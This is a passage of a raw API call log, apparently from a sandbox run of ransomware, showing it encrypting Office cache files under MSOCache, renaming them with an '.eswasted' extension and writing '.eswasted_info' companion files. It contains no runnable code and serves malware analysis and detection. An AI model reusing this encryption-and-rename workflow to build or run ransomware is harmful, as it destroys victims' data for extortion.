out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.347] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9458 | out: hHeap=0x4a0000) returned 1 [0069.347] lstrcpyW (in: lpString1=0x4d9246, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0069.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.eswasted")) returned 1 [0069.349] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.349] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0069.349] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x61d [0069.349] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61d) returned 0x2d0000 [0069.349] CloseHandle (hObject=0x110) returned 1 [0069.352] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0069.352] CloseHandle (hObject=0x114) returned 1 [0069.352] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d9458 [0069.352] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4d9660) returned 1 [0069.353] CryptGenRandom (in: hProv=0x4d9660, dwLen=0x1b8, pbBuffer=0x4d94a0 | out: pbBuffer=0x4d94a0) returned 1 [0069.353] CryptReleaseContext (hProv=0x4d9660, dwFlags=0x0) returned 1 [0069.353] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4d9660) returned 1 [0069.365] CryptGenRandom (in: hProv=0x4d9660, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0069.365] CryptReleaseContext (hProv=0x4d9660, dwFlags=0x0) returned 1 [0069.389] SetEndOfFile (hFile=0x10c) returned 1 [0069.391] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0069.391] CloseHandle (hObject=0x10c) returned 1 [0069.393] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0069.393] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4010 | out: hHeap=0x4a0000) returned 1 [0069.393] ResetEvent (hEvent=0xec) returned 1 [0069.393] _aulldvrm () returned 0x0 [0069.393] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4c4048) returned 1 [0069.394] CryptGenRandom (in: hProv=0x4c4048, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0069.394] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0069.394] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0069.394] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4dd498 [0069.394] lstrcpyW (in: lpString1=0x4dd530, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0069.394] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4d91a8 [0069.394] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4c4048) returned 1 [0069.395] CryptGenRandom (in: hProv=0x4c4048, dwLen=0xa46, pbBuffer=0x4d91a8 | out: pbBuffer=0x4d91a8) returned 1 [0069.395] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0069.395] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0069.395] WriteFile (in: hFile=0x10c, lpBuffer=0x4d91a8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4d91a8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0069.396] SetEndOfFile (hFile=0x10c) returned 1 [0069.396] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.396] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0069.397] lstrcpyW (in: lpString1=0x4dd530, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0069.397] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.040] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.040] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0070.040] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x8f8 [0070.040] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f8) returned 0x2d0000 [0070.040] CloseHandle (hObject=0x110) returned 1 [0070.042] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0070.042] CloseHandle (hObject=0x118) returned 1 [0070.042] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4dd748 [0070.042] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4c4048) returned 1 [0070.043] CryptGenRandom (in: hProv=0x4c4048, dwLen=0x1b8, pbBuffer=0x4dd790 | out: pbBuffer=0x4dd790) returned 1 [0070.043] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.043] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4c4048) returned 1 [0070.044] CryptGenRandom (in: hProv=0x4c4048, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.044] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.053] SetEndOfFile (hFile=0x10c) returned 1 [0070.055] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.055] CloseHandle (hObject=0x10c) returned 1 [0070.056] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.056] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4da1f8 | out: hHeap=0x4a0000) returned 1 [0070.056] WaitForMultipleObjects (nCount=0x2, lpHandles=0x121ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0070.057] ResetEvent (hEvent=0xec) returned 1 [0070.057] _aulldvrm () returned 0x0 [0070.057] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4da200) returned 1 [0070.058] CryptGenRandom (in: hProv=0x4da200, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.058] CryptReleaseContext (hProv=0x4da200, dwFlags=0x0) returned 1 [0070.058] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0070.058] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b2) returned 0x4d91a8 [0070.058] lstrcpyW (in: lpString1=0x4d9250, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.058] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4d9468 [0070.058] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4da1c8) returned 1 [0070.059] CryptGenRandom (in: hProv=0x4da1c8, dwLen=0xa46, pbBuffer=0x4d9468 | out: pbBuffer=0x4d9468) returned 1 [0070.059] CryptReleaseContext (hProv=0x4da1c8, dwFlags=0x0) returned 1 [0070.059] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.060] WriteFile (in: hFile=0x118, lpBuffer=0x4d9468*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4d9468*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.060] SetEndOfFile (hFile=0x118) returned 1 [0070.061] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.061] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9468 | out: hHeap=0x4a0000) returned 1 [0070.061] lstrcpyW (in: lpString1=0x4d9250, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.eswasted")) returned 1 [0070.061] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.061] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.062] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x5aa [0070.062] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0x2d0000 [0070.062] CloseHandle (hObject=0x110) returned 1 [0070.065] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0070.065] CloseHandle (hObject=0x11c) returned 1 [0070.065] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d9468 [0070.065] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4da200) returned 1 [0070.066] CryptGenRandom (in: hProv=0x4da200, dwLen=0x1b8, pbBuffer=0x4d94b0 | out: pbBuffer=0x4d94b0) returned 1 [0070.066] CryptReleaseContext (hProv=0x4da200, dwFlags=0x0) returned 1 [0070.066] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4da200) returned 1 [0070.066] CryptGenRandom (in: hProv=0x4da200, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.066] CryptReleaseContext (hProv=0x4da200, dwFlags=0x0) returned 1 [0070.075] SetEndOfFile (hFile=0x118) returned 1 [0070.077] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de4a0 | out: hHeap=0x4a0000) returned 1 [0070.077] CloseHandle (hObject=0x118) returned 1 [0070.080] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.080] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4010 | out: hHeap=0x4a0000) returned 1 [0070.080] WaitForMultipleObjects (nCount=0x2, lpHandles=0x121ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0070.177] ResetEvent (hEvent=0xec) returned 1 [0070.177] _aulldvrm () returned 0x0 [0070.177] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4d9498) returned 1 [0070.178] CryptGenRandom (in: hProv=0x4d9498, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.178] CryptReleaseContext (hProv=0x4d9498, dwFlags=0x0) returned 1 [0070.178] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.178] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4d9498 [0070.178] lstrcpyW (in: lpString1=0x4d9530, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.178] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4d9748 [0070.178] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4da198) returned 1 [0070.179] CryptGenRandom (in: hProv=0x4da198, dwLen=0xa46, pbBuffer=0x4d9748 | out: pbBuffer=0x4d9748) returned 1 [0070.179] CryptReleaseContext (hProv=0x4da198, dwFlags=0x0) returned 1 [0070.179] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0070.179] WriteFile (in: hFile=0x114, lpBuffer=0x4d9748*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4d9748*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.180] SetEndOfFile (hFile=0x114) returned 1 [0070.180] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.180] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9748 | out: hHeap=0x4a0000) returned 1 [0070.180] lstrcpyW (in: lpString1=0x4d9530, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.181] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.181] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.181] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x75e [0070.181] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x75e) returned 0x2d0000 [0070.181] CloseHandle (hObject=0x118) returned 1 [0070.184] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0070.184] CloseHandle (hObject=0x11c) returned 1 [0070.184] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d9748 [0070.184] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4d9950) returned 1 [0070.185] CryptGenRandom (in: hProv=0x4d9950, dwLen=0x1b8, pbBuffer=0x4d9790 | out: pbBuffer=0x4d9790) returned 1 [0070.185] CryptReleaseContext (hProv=0x4d9950, dwFlags=0x0) returned 1 [0070.185] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4d9950) returned 1 [0070.186] CryptGenRandom (in: hProv=0x4d9950, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.186] CryptReleaseContext (hProv=0x4d9950, dwFlags=0x0) returned 1 [0070.194] SetEndOfFile (hFile=0x114) returned 1 [0070.196] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.196] CloseHandle (hObject=0x114) returned 1 [0070.198] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9498 | out: hHeap=0x4a0000) returned 1 [0070.198] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4010 | out: hHeap=0x4a0000) returned 1 [0070.198] WaitForMultipleObjects (nCount=0x2, lpHandles=0x121ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0070.212] ResetEvent (hEvent=0xec) returned 1 [0070.212] _aulldvrm () returned 0x0 [0070.212] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4c4110) returned 1 [0070.213] CryptGenRandom (in: hProv=0x4c4110, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.213] CryptReleaseContext (hProv=0x4c4110, dwFlags=0x0) returned 1 [0070.213] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0070.213] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b0) returned 0x4d9400 [0070.213] lstrcpyW (in: lpString1=0x4d94a6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.213] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4d96b8 [0070.213] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4c4110) returned 1 [0070.214] CryptGenRandom (in: hProv=0x4c4110, dwLen=0xa46, pbBuffer=0x4d96b8 | out: pbBuffer=0x4d96b8) returned 1 [0070.214] CryptReleaseContext (hProv=0x4c4110, dwFlags=0x0) returned 1 [0070.214] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.215] WriteFile (in: hFile=0x11c, lpBuffer=0x4d96b8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4d96b8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.216] SetEndOfFile (hFile=0x11c) returned 1 [0070.216] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.216] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d96b8 | out: hHeap=0x4a0000) returned 1 [0070.216] lstrcpyW (in: lpString1=0x4d94a6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.eswasted")) returned 1 [0070.217] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.217] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0070.217] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x5aa [0070.217] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0x2d0000 [0070.217] CloseHandle (hObject=0x118) returned 1 [0070.222] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0070.222] CloseHandle (hObject=0x110) returned 1 [0070.222] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d96b8 [0070.222] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4c4110) returned 1 [0070.223] CryptGenRandom (in: hProv=0x4c4110, dwLen=0x1b8, pbBuffer=0x4d9700 | out: pbBuffer=0x4d9700) returned 1 [0070.223] CryptReleaseContext (hProv=0x4c4110, dwFlags=0x0) returned 1 [0070.223] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4c4110) returned 1 [0070.224] CryptGenRandom (in: hProv=0x4c4110, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.224] CryptReleaseContext (hProv=0x4c4110, dwFlags=0x0) returned 1 [0070.234] SetEndOfFile (hFile=0x11c) returned 1 [0070.237] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.237] CloseHandle (hObject=0x11c) returned 1 [0070.238] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.238] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4010 | out: hHeap=0x4a0000) returned 1 [0070.238] ResetEvent (hEvent=0xec) returned 1 [0070.238] _aulldvrm () returned 0x0 [0070.238] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4c4048) returned 1 [0070.239] CryptGenRandom (in: hProv=0x4c4048, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.239] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.239] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.239] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4d9400 [0070.239] lstrcpyW (in: lpString1=0x4d9498, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.239] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0070.239] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4c4048) returned 1 [0070.240] CryptGenRandom (in: hProv=0x4c4048, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0070.240] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.240] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c 